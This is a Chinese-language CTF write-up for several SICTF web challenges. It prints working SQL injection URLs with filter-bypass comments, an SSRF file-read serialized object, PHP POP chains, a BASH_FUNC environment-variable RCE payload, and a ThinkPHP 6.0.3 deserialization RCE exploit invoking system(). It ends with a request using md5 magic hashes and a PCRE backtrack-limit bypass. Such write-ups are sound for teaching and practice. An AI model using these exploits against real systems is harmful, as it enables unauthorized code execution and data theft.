100%_upload

将一句话木马 Base64 编码后上传,然后用 filter 将其 include。

hacker

试了下发现只有 ?username=flag 是有值的,那就接着写 SQL 吧!稍微有点过滤,问题不大:

view-source:http://yuanshen.life:39528/?username=flag%27/**/union/**/select/**/(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database())%23
可以查到有这些表: flag, users

view-source:http://yuanshen.life:39528/?username=flag%27/**/union/**/select/**/(select/**/group_concat(a,%27,%27,b,%27,%27,c)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b,3/**/as/**/c/**/union/**/select/**/*/**/from/**/users)as/**/d)%23
users 表里没啥东西

view-source:http://yuanshen.life:39528/?username=flag%27/**/union/**/select/**/(select/**/group_concat(a,%27,%27,b)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b/**/union/**/select/**/*/**/from/**/flag)as/**/d)%23
flag 真的在 flag 表里: flag, SICTF{5b6247d8-9e5b-4cbc-a579-9d779fec77ef}

EZ_SSRF

不要相信出题人说 Flag 在 /flag 就可以了:

/**
 * Local stand-in for the `client` class the challenge unserializes.
 *
 * Only the property names matter here: serialize() records the class name,
 * each property name and its declaration order, so the properties are kept
 * untyped and in this order on purpose (a typed, uninitialized property
 * would be dropped from the serialized form instead of appearing as null).
 */
class client
{
public $url;
public $payload;
}

// Build the serialized `client` whose url points at the local flag file
// instead of the /flag path the challenge text advertises; `payload` is
// deliberately left at its default so it serializes as null.
$obj = new client();
$obj->url = 'file:///var/www/html/flag.php';
echo serialize($obj);

Not just unserialize

POP 链并不难构造:

// Assemble the chain inside-out (ET -> CR -> SE -> start) and print it
// base64-encoded. Property assignment order is kept identical to the
// original so the serialized output does not change.
$tail = new ET();

$year = new CR();
$year->newyear = "WORRIES";
$year->last = $tail;

$welcome = new SE();
$welcome->year = $year;

$obj = new start();
$obj->you = '233';
$obj->welcome = $welcome;

print(base64_encode(serialize($obj)));

有点难度的是利用环境变量进行 RCE,还好有参考资料

get[BASH_FUNC_echo%%]=%28%29%20%7B%20cat%20%2F%2A%3B%20%7D
^ () { cat /*; }

Oyst3rPHP

这题有源代码泄露,直接下载 www.zip 扒下来一看,果然是 ThinkPHP。

/**
 * Challenge controller action (the enclosing class is not shown in this
 * excerpt). Reads `left`/`right` from the query string and `key`/`payload`
 * from the POST body, prints the "oyster" milestones and finally
 * unserializes the caller-controlled payload.
 *
 * Review notes, from a defender's point of view:
 *  - `md5($right) == md5($left)` is a loose comparison. When both digests
 *    look numeric PHP compares them as numbers, so `===` (or hash_equals())
 *    is the only safe form.
 *  - preg_match() returns false (not 0) when PCRE aborts, e.g. on the
 *    backtrack limit for a very long input; the plain truthiness test below
 *    then skips die(). Check `=== 1` and preg_last_error() instead.
 *  - `@unserialize()` on request data instantiates arbitrary autoloadable
 *    classes; the `@` also hides the warnings that would show up in logs.
 */
public function index()
{
echo "RT,一个很简单的Web,给大家送一点分,再送三只生蚝,过年一起吃生蚝哈";
echo "<img src='../Oyster.png'" . "/>";

// Note the swapped names: $right receives ?left= and $left receives ?right=.
// `@` suppresses the "undefined index" notice when a parameter is absent.
$payload = base64_decode(@$_POST['payload']);
$right = @$_GET['left'];
$left = @$_GET['right'];

$key = (string)@$_POST['key'];
// Strict inequality on the raw values, but loose equality on the digests:
// two md5 hex strings of the form "0e<digits>" compare equal under `==`.
if ($right !== $left && md5($right) == md5($left)) {

echo "Congratulations on getting your first oyster";
echo "<img src='../Oyster1.png'" . "/>";

// `/.+?THINKPHP/is` with `i` is case-insensitive, so any key that also
// satisfies the stripos() check below normally matches here and dies.
// preg_match() returning false on a PCRE error is the only way past this
// guard — the writeup's request at the bottom of the page (a very long
// key) presumably relies on that; a `=== 1` check plus preg_last_error()
// would close it.
if (preg_match('/.+?THINKPHP/is', $key)) {
die("Oysters don't want you to eat");
}
if (stripos($key, '603THINKPHP') === false) {
die("!!!Oysters don't want you to eat!!!");
}

echo "WOW!!!Congratulations on getting your second oyster";
echo "<img src='../Oyster2.png'" . "/>";

// Deserialization of attacker-controlled data: any __wakeup/__destruct/
// __toString gadget reachable through the framework's autoloader runs
// here. The return value is discarded; only the side effects matter.
@unserialize($payload);
// The last oyster is in the root directory and contains the Flag??? How do you find it??? What is its name???
// A comment somewhere in the source gives a hint — this tests whether you really understand the Oyst3rphp framework!!!
// Small tip: the "skinny dog" function ┗|`O′|┛ awoo~~
}
}

这部分并不难绕,主要还是 ThinkPHP 6.0.3 的反序列化 RCE。网上随便扒个 Exp 下来:

namespace think\model\concern;

/**
 * Local shadow of ThinkPHP's think\model\concern\Attribute trait.
 *
 * Only the two private properties carried by the serialized payload are
 * declared; their values are what the referenced RCE exploit relies on
 * (NOTE(review): the framework code that consumes them is not visible here
 * — confirm against the ThinkPHP 6.0.3 sources). serialize() encodes
 * property names, visibility and declaration order, so this declaration is
 * kept exactly as the writeup has it.
 */
trait Attribute
{
private $data = ["key" => "cat /Oyst3333333r.php"];
private $withAttr = ["key" => "system"];
}

namespace think;

/**
 * Minimal stand-in for think\Model carrying only the properties that must
 * appear in the serialized object. The real class has many more; the
 * target's unserialize() only needs these names and visibilities to line up.
 *
 * The boolean flags are copied verbatim from the referenced exploit. Their
 * effect lives in the real framework's destructor/save logic, which is not
 * part of this listing — TODO confirm against ThinkPHP 6.0.3 before relying
 * on this description.
 */
abstract class Model
{
use model\concern\Attribute;
private $lazySave = true;
protected $withEvent = false;
private $exists = true;
private $force = true;
protected $name;
/**
 * @param mixed $obj stored in $name unchanged; the script that follows
 *                   nests a second Pivot here.
 */
public function __construct($obj = "")
{
$this->name = $obj;
}
}

namespace think\model;

use think\Model;

/**
 * Concrete subclass so the abstract Model can be instantiated. The name is
 * chosen to match the class shipped by the framework, so the serialized
 * class name resolves on the target (presumably think\model\Pivot — verify).
 */
class Pivot extends Model
{
}

// Nest one Pivot inside another (the outer one keeps the inner in $name)
// and emit the result base64-encoded for use as the POST `payload` field.
$inner = new Pivot();
$outer = new Pivot($inner);
echo base64_encode(serialize($outer));

// fetch("http://yuanshen.life:37154/?left=QNKCDZO&right=240610708", {
// "headers": { "content-type": "application/x-www-form-urlencoded" },
// "body": "key=" + "0".repeat(1000000) + "603THINKPHP&payload=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",
// "method": "POST"
// });